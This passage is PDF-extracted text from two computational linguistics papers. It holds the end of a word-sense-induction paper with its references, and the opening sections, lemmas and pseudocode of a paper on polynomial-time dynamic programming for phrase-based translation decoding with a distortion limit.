to lie in linear superposition inside standard word embeddings like word2vec and GloVe. This has also been shown theoretically building upon 5Human subjects are graduate students from science or engi- neering majors at major U.S. universities. Non-native speakers have 7 to 10 years of English language use/learning. previous generative models, and empirical tests of this theory were presented. A priori, one imagines that showing such theoretical results about the in- ner structure of modern word embeddings would be hopeless since they are solutions to complicated nonconvex optimization. A new WSI method is also proposed based upon these insights that uses only the word embeddings and sparse coding, and shown to provide very com- petitive performance on some WSI benchmarks. One novel aspect of our approach is that the word senses are interrelated using one of about 2000 dis- course vectors that give a succinct description of which other words appear in the neighborhood with that sense. Our method based on sparse coding can be seen as a linear algebraic analog of the cluster- ing approaches, and also gives fine-grained thematic structure reminiscent of topic models. A novel police lineup test was also proposed for testing such WSI methods, where the algorithm is given a word w and word clusters, some of which belong to senses of w and the others are distractors belonging to senses of other words. The algorithm has to identify the ones belonging to w. We con- jecture this police lineup test with distractors will challenge some existing WSI methods, whereas our method was found to achieve performance similar to non-native speakers. 493 Acknowledgements We thank the reviewers and the action editor of TACL for helpful feedback and thank the editors for granting special relaxation of the page limit for our paper. This work was supported in part by NSF grants CCF-1527371, DMS-1317308, Simons In- vestigator Award, Simons Collaboration Grant, and ONR-N00014-16-1-2329. Tengyu Ma was addition- ally supported by the Simons Award in Theoretical Computer Science and by the IBM Ph.D. Fellow- ship. References Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, and Andrej Risteski. 2016. A latent variable model approach to PMI-based word embeddings. Trans- action of Association for Computational Linguistics, pages 385–399. Sanjeev Arora, Yingyu Liang, and Tengyu Ma. 2017. A simple but tough-to-beat baseline for sentence embed- dings. In In Proceedings of International Conference on Learning Representations. Javier Artiles, Enrique Amigó, and Julio Gonzalo. 2009. The role of named entities in web people search. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, pages 534– 542. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Jauvin. 2003. A neural probabilistic lan- guage model. Journal of Machine Learning Research, pages 1137–1155. David M. Blei. 2012. Probabilistic topic models. Com- munication of the Association for Computing Machin- ery, pages 77–84. Samuel Brody and Mirella Lapata. 2009. Bayesian word sense induction. In Proceedings of the 12th Confer- ence of the European Chapter of the Association for Computational Linguistics, pages 103–111. Jonathan Chang, Sean Gerrish, Chong Wang, Jordan L. Boyd-Graber, and David M. Blei. 2009. Reading tea leaves: How humans interpret topic models. In Advances in Neural Information Processing Systems, pages 288–296. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicogra- phy. Computational linguistics, pages 22–29. Ivan Damnjanovic, Matthew Davies, and Mark Plumb- ley. 2010. SMALLbox – an evaluation framework for sparse representations and dictionary learning al- gorithms. In International Conference on Latent Vari- able Analysis and Signal Separation, pages 418–425. Antonio Di Marco and Roberto Navigli. 2013. Clus- tering and diversifying web search results with graph- based word sense induction. Computational Linguis- tics, pages 709–754. Manaal Faruqui, Yulia Tsvetkov, Dani Yogatama, Chris Dyer, and Noah A. Smith. 2015. Sparse overcomplete word vector representations. In Proceedings of As- sociation for Computational Linguistics, pages 1491– 1500. Christiane Fellbaum. 1998. WordNet: An Electronic Lexical Database. MIT Press. John Rupert Firth. 1957. A synopsis of linguistic theory, 1930-1955. Studies in Linguistic Analysis. Alex Gittens, Dimitris Achlioptas, and Michael W Ma- honey. 2017. Skip-gram – Zipf + Uniform = Vector Additivity. In Proceedings of the 55th Annual Meet- ing of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 69–76. Thomas L. Griffiths, Mark Steyvers, and Joshua B. Tenenbaum. 2007. Topics in semantic representation. Psychological review, pages 211–244. Eric H. Huang, Richard Socher, Christopher D. Manning, and Andrew Y. Ng. 2012. Improving word representa- tions via global context and multiple word prototypes. In Proceedings of the 50th Annual Meeting of the Asso- ciation for Computational Linguistics, pages 873–882. Ignacio Iacobacci, Mohammad Taher Pilehvar, and Roberto Navigli. 2015. SensEmbed: Learning sense embeddings for word and relational similarity. In Pro- ceedings of Association for Computational Linguis- tics, pages 95–105. Omer Levy and Yoav Goldberg. 2014. Neural word embedding as implicit matrix factorization. In Ad- vances in Neural Information Processing Systems, pages 2177–2185. Suresh Manandhar, Ioannis P Klapaftis, Dmitriy Dligach, and Sameer S Pradhan. 2010. SemEval 2010: Task 14: Word sense induction & disambiguation. In Pro- ceedings of the 5th International Workshop on Seman- tic Evaluation, pages 63–68. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013a. Distributed represen- tations of words and phrases and their composition- ality. In Advances in Neural Information Processing Systems, pages 3111–3119. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013b. Linguistic regularities in continuous space word representations. In Proceedings of the Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 746–751. Andriy Mnih and Geoffrey Hinton. 2007. Three new graphical models for statistical language modelling. In 494 Proceedings of the 24th International Conference on Machine Learning, pages 641–648. Jiaqi Mu, Suma Bhat, and Pramod Viswanath. 2017. Ge- ometry of polysemy. In Proceedings of International Conference on Learning Representations. Brian Murphy, Partha Pratim Talukdar, and Tom M. Mitchell. 2012. Learning effective and interpretable semantic models using non-negative sparse embed- ding. In Proceedings of the 24th International Confer- ence on Computational Linguistics, pages 1933–1950. Roberto Navigli and Daniele Vannella. 2013. SemEval 2013: Task 11: Word sense induction and disambigua- tion within an end-user application. In Second Joint Conference on Lexical and Computational Semantics, pages 193–201. Arvind Neelakantan, Jeevan Shankar, Re Passos, and Andrew Mccallum. 2014. Efficient nonparametric estimation of multiple embeddings per word in vec- tor space. In Proceedings of Conference on Empiri- cal Methods in Natural Language Processing, pages 1059–1069. Bruno Olshausen and David Field. 1997. Sparse coding with an overcomplete basis set: A strategy employed by V1? Vision Research, pages 3311–3325. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global Vectors for word rep- resentation. In Proceedings of the Empiricial Methods in Natural Language Processing, pages 1532–1543. Joseph Reisinger and Raymond Mooney. 2010. Multi- prototype vector-space models of word meaning. In Proceedings of the Conference of the North American Chapter of the Association for Computational Linguis- tics: Human Language Technologies, pages 107–117. Andrew Rosenberg and Julia Hirschberg. 2007. V- measure: A conditional entropy-based external clus- ter evaluation measure. In Conference on Empirical Methods in Natural Language Processing and Confer- ence on Computational Natural Language Learning, pages 410–420. Hinrich Schutze. 1998. Automatic word sense discrimi- nation. Computational Linguistics, pages 97–123. Ran Tian, Naoaki Okazaki, and Kentaro Inui. 2017. The mechanism of additive composition. Machine Learn- ing, 106(7):1083–1130. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of seman- tics. Journal of Artificial Intelligence Research, pages 141–188. Wikimedia. 2012. English Wikipedia dump. Accessed March 2015. David Yarowsky. 1995. Unsupervised word sense dis- ambiguation rivaling supervised methods. In Proceed- ings of the 33rd Annual Meeting on Association for Computational Linguistics, pages 189–196. 495 496 work_y2ft2jwmyrby7fpj24hznq275e ---- A Polynomial-Time Dynamic Programming Algorithm for Phrase-Based Decoding with a Fixed Distortion Limit Yin-Wen Chang Google Research, New York yinwen@google.com Michael Collins∗ Google Research, New York mjcollins@google.com Abstract Decoding of phrase-based translation mod- els in the general case is known to be NP- complete, by a reduction from the traveling salesman problem (Knight, 1999). In practice, phrase-based systems often impose a hard distortion limit that limits the movement of phrases during translation. However, the im- pact on complexity after imposing such a con- straint is not well studied. In this paper, we describe a dynamic programming algorithm for phrase-based decoding with a fixed dis- tortion limit. The runtime of the algorithm is O(nd!lhd+1) where n is the sentence length, d is the distortion limit, l is a bound on the number of phrases starting at any position in the sentence, and h is related to the maximum number of target language translations for any source word. The algorithm makes use of a novel representation that gives a new perspec- tive on decoding of phrase-based models. 1 Introduction Phrase-based translation models (Koehn et al., 2003; Och and Ney, 2004) are widely used in statisti- cal machine translation. The decoding problem for phrase-based translation models is known to be dif- ficult: the results from Knight (1999) imply that in the general case decoding of phrase-based transla- tion models is NP-complete. The complexity of phrase-based decoding comes from reordering of phrases. In practice, however, various constraints on reordering are often imposed in phrase-based translation systems. A common constraint is a “distortion limit”, which places a hard constraint on how far phrases can move. The com- plexity of decoding with such a distortion limit is an open question: the NP-hardness result from Knight ∗On leave from Columbia University. (1999) applies to a phrase-based model with no dis- tortion limit. This paper describes an algorithm for phrase- based decoding with a fixed distortion limit whose runtime is linear in the length of the sentence, and for a fixed distortion limit is polynomial in other fac- tors. More specifically, for a hard distortion limit d, and sentence length n, the runtime is O(nd!lhd+1), where l is a bound on the number of phrases start- ing at any point in the sentence, and h is related to the maximum number of translations for any word in the source language sentence. The algorithm builds on the insight that de- coding with a hard distortion limit is related to the bandwidth-limited traveling salesman problem (BTSP) (Lawler et al., 1985). The algorithm is eas- ily amenable to beam search. It is quite different from previous methods for decoding of phrase-based models, potentially opening up a very different way of thinking about decoding algorithms for phrase- based models, or more generally for models in sta- tistical NLP that involve reordering. 2 Related Work Knight (1999) proves that decoding of word-to-word translation models is NP-complete, assuming that there is no hard limit on distortion, through a reduc- tion from the traveling salesman problem. Phrase- based models are more general than word-to-word models, hence this result implies that phrase-based decoding with unlimited distortion is NP-complete. Phrase-based systems can make use of both re- ordering constraints, which give a hard “distortion limit” on how far phrases can move, and reorder- ing models, which give scores for reordering steps, often penalizing phrases that move long distances. Moses (Koehn et al., 2007b) makes use of a distor- tion limit, and a decoding algorithm that makes use 59 Transactions of the Association for Computational Linguistics, vol. 5, pp. 59–71, 2017. Action Editor: Holger Schwenk. Submission batch: 10/2016; Revision batch: 11/2016; Published 2/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. of bit-strings representing which words have been translated. We show in Section 5.2 of this paper that this can lead to at least 2n/4 bit-strings for an input sentence of length n, hence an exhaustive version of this algorithm has worst-case runtime that is expo- nential in the sentence length. The current paper is concerned with decoding phrase-based models with a hard distortion limit. Various other reordering constraints have been considered. Zens and Ney (2003) and Zens et al. (2004) consider two types of hard constraints: the IBM constraints, and the ITG (inversion transduc- tion grammar) constraints from the model of Wu (1997). They give polynomial time dynamic pro- gramming algorithms for both of these cases. It is important to note that the IBM and ITG constraints are different from the distortion limit constraint con- sidered in the current paper. Decoding algorithms with ITG constraints are further studied by Feng et al. (2010) and Cherry et al. (2012). Kumar and Byrne (2005) describe a class of re- ordering constraints and models that can be encoded in finite state transducers. Lopez (2009) shows that several translation models can be represented as weighted deduction problems and analyzes their complexities.1 Koehn et al. (2003) describe a beam- search algorithm for phrase-based decoding that is in widespread use; see Section 5 for discussion. A number of reordering models have been pro- posed, see for example Tillmann (2004), Koehn et al. (2007a) and Galley and Manning (2008). DeNero and Klein (2008) consider the phrase alignment problem, that is, the problem of find- ing an optimal phrase-based alignment for a source- language/target-language sentence pair. They show that in the general case, the phrase alignment prob- lem is NP-hard. It may be possible to extend the techniques in the current paper to the phrase- alignment problem with a hard distortion limit. Various methods for exact decoding of phrase- based translation models have been proposed. Za- slavskiy et al. (2009) describe the use of travel- 1An earlier version of this paper states the complexity of de- coding with a distortion limit as O(I32d) where d is the distor- tion limit and I is the number of words in the sentence; however (personal communication from Adam Lopez) this runtime is an error, and should be O(2I) i.e., exponential time in the length of the sentence. A corrected version of the paper corrects this. ing salesman algorithms for phrase-based decod- ing. Chang and Collins (2011) describe an exact method based on Lagrangian relaxation. Aziz et al. (2014) describe a coarse-to-fine approach. These al- gorithms all have exponential time runtime (in the length of the sentence) in the worst case. Galley and Manning (2010) describe a decoding algorithm for phrase-based systems where phrases can have discontinuities in both the source and tar- get languages. The algorithm has some similarities to the algorithm we propose: in particular, it makes use of a state representation that contains a list of disconnected phrases. However, the algorithms dif- fer in several important ways: Galley and Manning (2010) make use of bit string coverage vectors, giv- ing an exponential number of possible states; in con- trast to our approach, the translations are not formed in strictly left-to-right ordering on the source side. 3 Background: The Traveling Salesman Problem on Bandwidth-Limited Graphs This section first defines the bandwidth-limited trav- eling salesman problem, then describes a polyno- mial time dynamic programming algorithm for the traveling salesman path problem on bandwidth lim- ited graphs. This algorithm is the algorithm pro- posed by Lawler et al. (1985)2 with small modifica- tions to make the goal a path instead of a cycle, and to consider directed rather than undirected graphs. 3.1 Bandwidth-Limited TSPPs The input to the problem is a directed graph G = (V,E), where V is a set of vertices and E is a set of directed edges. We assume that V = {1, 2, . . . ,n}. A directed edge is a pair (i,j) where i,j ∈ V , and i 6= j. Each edge (i,j) ∈ E has an associated weight wi,j. Given an integer k ≥ 1, a graph is bandwidth-limited with bandwidth k if ∀(i,j) ∈ E, |i− j| ≤ k The traveling salesman path problem (TSPP) on the graph G is defined as follows. We will assume that vertex 1 is the “source” vertex and vertex n is the “sink” vertex. The TSPP is to find the minimum cost directed path from vertex 1 to vertex n, which passes through each vertex exactly once. 2The algorithm is based on the ideas of Monien and Sudbor- ough (1981) and Ratliff and Rosenthal (1983). 60 3.2 An Algorithm for Bandwidth-Limited TSPPs The key idea of the dynamic-programming algo- rithm for TSPPs is the definition of equivalence classes corresponding to dynamic programming states, and an argument that the number of equiv- alence classes depends only on the bandwidth k. The input to our algorithm will be a directed graph G = (V,E), with weights wi,j, and with bandwidth k. We define a 1-n path to be any path from the source vertex 1 to the sink vertex n that visits each vertex in the graph exactly once. A 1-n path is a subgraph (V ′,E′) of G, where V ′ = V and E′ ⊆ E. We will make use of the following definition: Definition 1. For any 1-n path H, define Hj to be the subgraph that H induces on vertices 1, 2, . . .j, where 1 ≤ j ≤ n. That is, Hj contains the vertices 1, 2, . . .j and the edges in H between these vertices. For a given value for j, we divide the vertices V into three sets Aj, Bj and Cj: • Aj = {1, 2, . . . , (j −k)} (Aj is the empty set if j ≤ k). • Bj = {1 . . .j}\Aj.3 • Cj = {j + 1,j + 2, . . . ,n} (Cj is the empty set if j = n). Note that the vertices in subgraph Hj are the union of the sets Aj and Bj. Aj is the empty set if j ≤ k, but Bj is always non-empty. The following Lemma then applies: Lemma 1. For any 1-n path H in a graph with bandwidth k, for any 1 ≤ j ≤ n, the subgraph Hj has the following properties: 1. If vertex 1 is in Aj, then vertex 1 has degree one. 2. For any vertex v ∈ Aj with v ≥ 2, vertex v has degree two. 3. Hj contains no cycles. Proof. The first and second properties are true be- cause of the bandwidth limit. Under the constraint of bandwidth k, any edge (u,v) in H such that 3For sets X and Y we use the notation X \ Y to refer to the set difference: i.e., X \ Y = {x|x ∈ X and x /∈ Y }. u ∈ Aj, must have v ∈ Aj ∪ Bj = Hj. This fol- lows because if v ∈ Cj = {j + 1,j + 2, . . .n} and u ∈ Aj = {1, 2, . . .j − k}, then |u − v| > k. Similarly any edge (u,v) ∈ H such that v ∈ Aj must have u ∈ Aj ∪ Bj = Hj. It follows that for any vertex u ∈ Aj, with u > 1, there are edges (u,v) ∈ Hj and (v′,u) ∈ Hj, hence vertex u has degree 2. For vertex u ∈ Aj with u = 1, there is an edge (u,v) ∈ Hj, hence vertex u has degree 1. The third property (no cycles) is true because Hj is a subgraph of H, which has no cycles. It follows that each connected component of Hj is a directed path, that the start points of these paths are in the set {1}∪ Bj, and that the end points of these paths are in the set Bj. We now define an equivalence relation on sub- graphs. Two subgraphs Hj and H′j are in the same equivalence class if the following conditions hold (taken from Lawler et al. (1985)): 1. For any vertex v ∈ Bj, the degree of v in Hj and H′j is the same. 2. For each path (connected component) in Hj there is a path in H′j with the same start and end points, and conversely. The significance of this definition is as follows. Assume that H∗ is an optimal 1-n path in the graph, and that it induces the subgraph Hj on vertices 1 . . .j. Assume that H′j is another subgraph over vertices 1 . . .j, which is in the same equivalence class as Hj. For any subgraph Hj, define c(Hj) to be the sum of edge weights in Hj: c(Hj) = ∑ (u,v)∈Hj wu,v Then it must be the case that c(H′j) ≥ c(Hj). Oth- erwise, we could simply replace Hj by H′j in H ∗, thereby deriving a new 1-n path with a lower cost, implying that H∗ is not optimal. This observation underlies the dynamic program- ming approach. Define σ to be a function that maps a subgraph Hj to its equivalence class σ(Hj). The equivalence class σ(Hj) is a data structure that stores the degrees of the vertices in Bj, together with the start and end points of each connected compo- nent in Hj. 61 Next, define ∆ to be a set of 0, 1 or 2 edges be- tween vertex (j + 1) and the vertices in Bj. For any subgraph Hj+1 of a 1-n path, there is some ∆, sim- ply found by recording the edges incident to vertex (j + 1). For any Hj, define τ(σ(Hj), ∆) to be the equivalence class resulting from adding the edges in ∆ to the data structure σ(Hj). If adding the edges in ∆ to σ(Hj) results in an ill-formed subgraph—for example, a subgraph that has one or more cycles— then τ(σ(Hj), ∆) is undefined. The following re- currence then defines the dynamic program (see Eq. 20 of Lawler et al. (1985)): α(j + 1,S) = min ∆,S′:τ(S′,∆)=S ( α(j,S′) + c(∆) ) Here S is an equivalence class over vertices {1 . . . (j+1)}, and α(S,j+1) is the minimum score for any subgraph in equivalence class S. The min is taken over all equivalence classes S′ over vertices {1 . . .j}, together with all possible values for ∆. 4 A Dynamic Programming Algorithm for Phrase-Based Decoding We now describe the dynamic programming algo- rithm for phrase-based decoding with a fixed distor- tion limit. We first give basic definitions for phrase- based decoding, and then describe the algorithm. 4.1 Basic Definitions Consider decoding an input sentence consisting of words x1 . . .xn for some integer n. We assume that x1 = <s> and xn = </s> where <s> and </s> are the sentence start and end symbols respectively. A phrase-based lexicon specifies a set of possible translations in the form of phrases p = (s,t,e), where s and t are integers such that 1 ≤ s ≤ t ≤ n, and e is a sequence of m ≥ 1 target-language words e1 . . .em. This signifies that words xs . . .xt in the source language have a translation as e1 . . .em in the target language. We use s(p), t(p) and e(p) to refer to the three components of a phrase p = (s,t,e), and e1(p) . . .em(p) to refer to the words in the target- language string e(p). We assume that (1, 1,<s>) and (n,n,</s>) are the only translation entries with s(p) ≤ 1 and t(p) ≥ n respectively. A derivation is then defined as follows: Definition 2 (Derivations). A derivation is a se- quence of phrases p1 . . .pL such that • p1 = (1, 1,<s>) and pL = (n,n,</s>). • Each source word is translated exactly once. • The distortion limit is satisfied for each pair of phrases pi−1,pi, that is: |t(pi−1) + 1 −s(pi)| ≤ d ∀ i = 2 . . .L. where d is an integer specifying the distortion limit in the model. Given a derivation p1 . . .pL, a target-language translation can be obtained by concatenating the target-language strings e(p1) . . .e(pL). The scoring function is defined as follows: f(p1 . . .pL) = λ(e(p1) . . .e(pL)) + L∑ i=1 κ(pi) + L∑ i=2 η ×|t(pi−1) + 1 −s(pi)| (1) For each phrase p, κ(p) is the translation score for the phrase. The parameter η is the distortion penalty, which is typically a negative constant. λ(e) is a lan- guage model score for the string e. We will assume a bigram language model: λ(e1 . . .em) = m∑ i=2 λ(ei|ei−1). The generalization of our algorithm to higher-order n-gram language models is straightforward. The goal of phrase-based decoding is to find y∗ = arg maxy∈Y f(y) where Y is the set of valid deriva- tions for the input sentence. Remark (gap constraint): Note that a common restriction used in phrase-based decoding (Koehn et al., 2003; Chang and Collins, 2011), is to im- pose an additional “gap constraint” while decod- ing. See Chang and Collins (2011) for a descrip- tion. In this case it is impossible to have a dynamic- programming state where word xi has not been translated, and where word xi+k has been translated, for k > d. This limits distortions further, and it can be shown in this case that the number of possible bitstrings is O(2d) where d is the distortion limit. Without this constraint the algorithm of Koehn et al. (2003) actually fails to produce translations for many input sentences (Chang and Collins, 2011). 62 H1 = 〈π1〉 = 〈〈( 1, 1,<s> )〉〉 H3 = 〈π1〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )〉〉 H4 = 〈π1〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )( 4, 4, also )〉〉 H6 = 〈π1,π2〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )( 4, 4, also )〉 , 〈( 5, 6, these criticisms )〉〉 H7 = 〈π1,π2〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )( 4, 4, also )〉 , 〈( 5, 6, these criticisms )( 7, 7, seriously )〉〉 H8 = 〈π1〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )( 4, 4, also )( 8, 8, take )( 5, 6, these criticisms )( 7, 7, seriously )〉〉 H9 = 〈π1〉 = 〈〈( 1, 1,<s> )( 2, 3, we must )( 4, 4, also )( 8, 8, take )( 5, 6, these criticisms )( 7, 7, seriously )( 9, 9, </s> )〉〉 Figure 1: Sub-derivations Hj for j ∈ {1, 3, 4, 6, 7, 8, 9} induced by the full derivation H =〈〈 (1, 1,<s>)(2, 3, we must)(4, 4, also)(8, 8, take)(5, 6, these criticisms)(7, 7, seriously)(9, 9</s>) 〉〉 . Note that Hj includes the phrases that cover spans ending before or at position j. Sub-derivation Hj is extended to another sub- derivation Hj+i by incorporating a phrase of length i. 4.2 The Algorithm We now describe the dynamic programming algo- rithm. Intuitively the algorithm builds a deriva- tion by processing the source-language sentence in strictly left-to-right order. This is in contrast with the algorithm of Koehn et al. (2007b), where the target- language sentence is constructed from left to right. Throughout this section we will use π, or πi for some integer i, to refer to a sequence of phrases: π = 〈 p1 . . .pl 〉 where each phrase pi = (s(pi), t(pi),e(pi)), as de- fined in the previous section. We overload the s, t and e operators, so that if π = 〈 p1 . . .pl 〉 , we have s(π) = s(p1), t(π) = t(pl), and e(π) = e(p1)·e(p2) . . .·e(pl), where x·y is the concatenation of strings x and y. A derivation H consists of a single phrase se- quence π = 〈 p1 . . .pL 〉 : H = π = 〈 p1 . . .pL 〉 where the sequence p1 . . .pL satisfies the con- straints in definition 2. We now give a definition of sub-derivations and complement sub-derivations: Definition 3 (Sub-derivations and Complement Sub- -derivations). For any H = 〈 p1 . . .pL 〉 , for any j ∈ {1 . . .n} such that ∃i ∈ {1 . . .L} s.t. t(pi) = j, the sub-derivation Hj and the complement sub- derivation H̄j are defined as Hj =〈π1 . . .πr〉, H̄j = 〈π̄1 . . . π̄r〉 where the following properties hold: • r is an integer with r ≥ 1. • Each πi for i = 1 . . .r is a sequence of one or more phrases, where each phrase p ∈ πi has t(p) ≤ j. • Each π̄i for i = 1 . . . (r−1) is a sequence of one or more phrases, where each phrase p ∈ π̄i has s(p) > j. • π̄r is a sequence of zero or more phrases, where each phrase p ∈ π̄r has s(p) > j. We have zero phrases in π̄r iff j = n where n is the length of the sentence. • Finally, π1 · π̄1 · π2 · π̄2 . . .πr · π̄r = p1 . . .pL where x · y denotes the concatenation of phrase sequences x and y. Note that for any j ∈ {1 . . .n} such that @i ∈ {1 . . .L} such that t(pi) = j, the sub-derivation Hj and the complement sub-derivation H̄j is not de- fined. Thus for each integer j such that there is a phrase in H ending at point j, we can divide the phrases in H into two sets: phrases p with t(p) ≤ j, and phrases p with s(p) > j. The sub-derivation Hj lists all maximal sub-sequences of phrases with t(p) ≤ j. The complement sub-derivation H̄j lists all maximal sub-sequences of phrases with s(p) > j. Figure 1 gives all sub-derivations Hj for the derivation H = 〈〈 p1 . . .p7 〉〉 = 〈〈 (1, 1,<s>)(2, 3, we must)(4, 4, also) (8, 8, take)(5, 6, these criticisms) (7, 7, seriously)(9, 9,</s>) 〉〉 As one example, the sub-derivation H7 = 〈π1,π2〉 induced by H has two phrase sequences: π1 = 〈 (1, 1,<s>)(2, 3, we must)(4, 4, also) 〉 π2 = 〈 (5, 6, these criticisms)(7, 7, seriously) 〉 Note that the phrase sequences π1 and π2 give trans- lations for all words x1 . . .x7 in the sentence. There 63 are two disjoint phrase sequences because in the full derivation H, the phrase p = (8, 8, take), with t(p) = 8 > 7, is used to form a longer sequence of phrases π1 pπ2. For the above example, the complement sub- derivation H̄7 is as follows: π̄1 = 〈 (8, 8,take) 〉 π̄2 = 〈 (9, 9,</s>) 〉 It can be verified that π1·π̄1·π2·π̄2 = H as required by the definition of sub-derivations and complement sub-derivations. We now state the following Lemma: Lemma 2. For any derivation H = p1 . . .pL, for any j such that ∃i such that t(pi) = j, the sub- derivation Hj = 〈π1 . . .πr〉 satisfies the following properties: 1. s(π1) = 1 and e1(π1) = <s>. 2. For all positions i ∈ {1 . . .j}, there exists a phrase p ∈ π, for some phrase sequence π ∈ Hj, such that s(p) ≤ i ≤ t(p). 3. For all i = 2 . . .r, s(πi) ∈{(j −d + 2) . . .j} 4. For all i = 1 . . .r, t(πi) ∈{(j −d) . . .j} Here d is again the distortion limit. This lemma is a close analogy of Lemma 1. The proof is as follows: Proof of Property 1: For all values of j, the phrase p1 = (1, 1,<s>) has t(p1) ≤ j, hence we must have π1 = p1 . . .pk for some k ∈ {1 . . .L}. It follows that s(π1) = 1 and e1(π1) = <s>. Proof of Property 2: For any position i ∈ {1 . . .j}, define the phrase (s,t,e) in the derivation H to be the phrase that covers word i; i.e., the phrase such that s ≤ i ≤ t. We must have s ∈ {1 . . .j}, because s ≤ i and i ≤ j. We must also have t ∈{1 . . .j}, because otherwise we have s ≤ j < t, which contradicts the assumption that there is some i ∈{1 . . .L} such that t(pi) = j. It follows that the phrase (s,t,e) has t ≤ j, and from the definition of sub-derivations it follows that the phrase is in one of the phrase sequences π1 . . .πr. Proof of Property 3: This follows from the distor- tion limit. Consider the complement sub-derivation H̄j = 〈π̄1 . . . π̄r〉. For the distortion limit to be sat- isfied, for all i ∈{2 . . .r}, we must have |t(π̄i−1) + 1 −s(πi)| ≤ d We must also have t(π̄i−1) > j, and s(πi) ≤ j, by the definition of sub-derivations. It follows that s(πi) ∈{(j −d + 2) . . .j}. Proof of Property 4: This follows from the distortion limit. First consider the case where π̄r is non-empty. For the distortion limit to be satisfied, for all i ∈ {1 . . .r}, we must have |t(πi) + 1 −s(π̄i)| ≤ d We must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. It follows that t(πi) ∈ {(j −d) . . .j}. Next consider the case where π̄r is empty. In this case we must have j = n. For the distortion limit to be satisfied, for all i ∈{1 . . . (r−1)}, we must have |t(πi) + 1 −s(π̄i)| ≤ d We must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. It follows that t(πi) ∈ {(j−d) . . .j} for i ∈{1 . . . (r−1)}. For i = r, we must have t(πi) = n, from which it again follows that t(πr) = n ∈{(j −d) . . .j}. We now define an equivalence relation between sub-derivations, which will be central to the dy- namic programming algorithm. We define a func- tion σ that maps a phrase sequence π to its signature. The signature is a four-tuple: σ(π) = (s,ws, t,wt). where s is the start position, ws is the start word, t is the end position and wt is the end word of the phrase sequence. We will use s(σ), ws(σ), t(σ), and wt(σ) to refer to each component of a signature σ. For example, given a phrase sequence π = 〈 (1, 1, <s>) (2, 2, we) (4, 4, also) 〉 , its signature is σ(π) = (1, <s>, 4, also). The signature of a sub-derivation Hj = 〈π1 . . .πr〉 is defined to be σ(Hj) = 〈σ(π1) . . .σ(πr)〉. For example, with H7 as defined above, we have σ(H7) = 〈( 1,<s>, 4, also ) , ( 5, these, 7, seriously )〉 Two partial derivations Hj and H′j are in the same equivalence class iff σ(Hj) = σ(H′j). We can now state the following Lemma: 64 Lemma 3. Define H∗ to be the optimal deriva- tion for some input sentence, and H∗j to be a sub- derivation of H∗. Suppose H′j is another sub- derivation with j words, such that σ(H′j) = σ(H ∗ j ). Then it must be the case that f(H∗j ) ≥ f(H′j), where f is the function defined in Section 4.1. Proof. Define the sub-derivation and complement sub-derivation of H∗ as H∗j = 〈π1 . . .πr〉 H̄∗j = 〈π̄1 . . . π̄r〉 We then have f(H∗) = f(H∗j ) + f(H̄ ∗ j ) + γ (2) where f(. . .) is as defined in Eq. 1, and γ takes into account the bigram language modeling scores and the distortion scores for the transitions π1 → π̄1, π̄1 → π2, π2 → π̄2, etc. The proof is by contradiction. Define H′j = π ′ 1 . . .π ′ r and assume that f(H∗j ) < f(H ′ j). Now consider H′ = π′1π̄1π ′ 2π̄2 . . .π ′ rπ̄r This is a valid derivation because the transitions π′1 → π̄1, π̄1 → π′2, π′2 → π̄2 have the same dis- tortion distances as π1 → π̄1, π̄1 → π2, π2 → π̄2, hence they must satisfy the distortion limit. We have f(H′) = f(H′j) + f(H̄ ∗ j ) + γ (3) where γ has the same value as in Eq. 2. This fol- lows because the scores for the transitions π′1 → π̄1, π̄1 → π′2, π′2 → π̄2 are identical to the scores for the transitions π1 → π̄1, π̄1 → π2, π2 → π̄2, because σ(H∗j ) = σ(H ′ j). It follows from Eq. 2 and Eq. 3 that if f(H′j) > f(H∗j ), then f(H ′) > f(H∗). But this contradicts the assumption that H∗ is optimal. It follows that we must have f(H′j) ≤ f(H∗j ). This lemma leads to a dynamic programming al- gorithm. Each dynamic programming state consists of an integer j ∈{1 . . .n} and a set of r signatures: T = (j,{σ1 . . .σr}) Figure 2 shows the dynamic programming algo- rithm. It relies on the following functions: Inputs: • An integer n specifying the length of the input sequence. • A function δ(T) returning the set of valid transitions from state T . • A function τ(T, ∆) returning the state reached from state T by transition ∆ ∈ δ(T). • A function valid(T) returning TRUE if state T is valid, otherwise FALSE. • A function score(∆) that returns the score for any transition ∆. Initialization: T1 = (1,{(1,<s>, 1,<s>)}) α(T1) = 0 T1 = {T1}, ∀j ∈{2 . . .n},Tj = ∅ for j = 1, . . . ,n− 1 for each state T ∈Tj for each ∆ ∈ δ(T) T ′ = τ(T, ∆) if valid(T ′) = FALSE: continue score = α(T) + score(∆) Define t to be the integer such that T ′ = (t,{σ1 . . .σr}) if T ′ /∈Tt Tt = Tt ∪{T ′} α(T ′) = score bp(T ′) = (∆) else if score > α(T ′) α(T ′) = score bp(T ′) = (∆) Return: the score of the state (n,{(1,<s>,n,</s>)}) in Tn, and backpointers bp defining the transitions leading to this state. Figure 2: The phrase-based decoding algorithm. α(T) is the score for state T . The bp(T) variables are back- pointers used in recovering the highest scoring sequence of transitions. • For any state T , δ(T) is the set of outgoing tran- sitions from state T . • For any state T , for any transition ∆ ∈ δ(T), τ(T, ∆) is the state reached by transition ∆ from state T . • For any state T , valid(T) checks if a resulting state is valid. • For any transition ∆, score(∆) is the score for the transition. We next give full definitions of these functions. 4.2.1 Definitions of δ(T) and τ(T, ∆) Recall that for any state T , δ(T) returns the set of possible transitions from state T . In addition τ(T, 